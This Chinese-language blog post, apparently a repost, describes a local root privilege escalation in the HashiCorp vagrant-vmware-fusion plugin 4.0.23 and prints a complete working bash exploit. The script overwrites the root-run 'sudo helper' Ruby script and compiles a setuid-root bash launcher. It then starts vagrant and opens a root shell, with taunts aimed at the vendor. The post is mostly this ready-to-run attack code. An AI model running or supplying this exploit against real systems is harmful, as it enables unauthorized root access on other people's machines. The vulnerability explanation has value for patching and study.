AD

Hashicorp_vagrant-vmware-fusion_4.0.23_local_root_es

Hashicorp vagrant-vmware-fusion 4.0.23及之前版本,存在一个本地root权限提升漏洞。在vagrant-vmware-fusion会在“~/.vagrant.d/gems/2.2.5/gems/vagrant-vmware-fusion-4.0.22/bin”目录下安装一个“sudo helper”的加密ruby脚本和四个不同架构的包装器:
vagrant_vmware_desktop_sudo_helper                 
vagrant_vmware_desktop_sudo_helper_wrapper_darwin_386
vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64
vagrant_vmware_desktop_sudo_helper_wrapper_linux_386
vagrant_vmware_desktop_sudo_helper_wrapper_linux_amd64

vagrant启动时,和当前系统匹配的包装器会启动,并且以root权限“sudo helper”的加密脚本。
在旧的版本中,可以利用未授权的系统“ruby”直接调用包装器,在当前目录执行任意ruby脚本。但到4.0.22版本时,会检查调用者,如果不是vagrant调用的该脚本,则会拒绝执行。
         但是该安全措施任存在一个漏洞,即包装器是以root权限运行“sudo helper”脚本的,但“sudo helper”并不是root只读状态,攻击者可以用恶意ruby脚本覆盖他,当vagrant启动时,则会执行覆盖后的ruby脚本。
#!/bin/bash
echo
echo "****************************************************************"
echo "* Wooo vmware_fusion plugin 4.0.22-4.0.23 is still exploitable *"
echo "* m4rkw                                                        *"
echo "****************************************************************"
echo
echo "Shouts to #coolkids"
echo

vuln_bin=`find ~/.vagrant.d/ -name vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64 -perm +4000 |tail -n1`
target="/tmp/vagrant_vmware_privesc_4.0.23"

if [ "$vuln_bin" == "" ] ; then
  echo "Vulnerable binary not found."
  exit 1
fi

if [ -e "$target" ] ; then
  echo "Exploit payload already present."
  $target
  exit
fi

box=`vagrant box list |grep '(vmware_desktop' |head -n1 |cut -d ' ' -f1`

if [ "$box" == "" ] ; then
  echo "No vmware_fusion boxes found locally, we will have to download one."
  echo
  echo "This will take a few minutes."
  echo
  box="bento/ubuntu-16.04"
fi

dir=`dirname "$vuln_bin"`

cd "$dir"

if [ ! -e "vagrant_vmware_desktop_sudo_helper.bak" ] ; then
  mv vagrant_vmware_desktop_sudo_helper vagrant_vmware_desktop_sudo_helper.bak
fi

cat > $target.c <
#include
int main()
{
  setuid(0);
  seteuid(0);
  execl("/bin/bash","bash","-c","/bin/bash;rm -f $target",NULL);
  return 0;
}
EOF
gcc -o $target $target.c
rm -f $target.c

cat > vagrant_vmware_desktop_sudo_helper <
#!/usr/bin/env ruby
\`chown root:wheel $target\`
\`chmod 4755 $target\`
EOF

chmod 755 vagrant_vmware_desktop_sudo_helper

cat > vagrantfile <
Vagrant.configure('2') do |config|
  config.vm.box = '$box'
end
EOF

vagrant up 2>/dev/null &

while :
do
  r=`ls -la $target |grep -- '-rwsr-xr-x  1 root  wheel'`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.2
done

killall -9 vagrant

echo
echo "Sorry Hashicorp.. still fail :P"
echo

sleep 1
cd
$target


评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce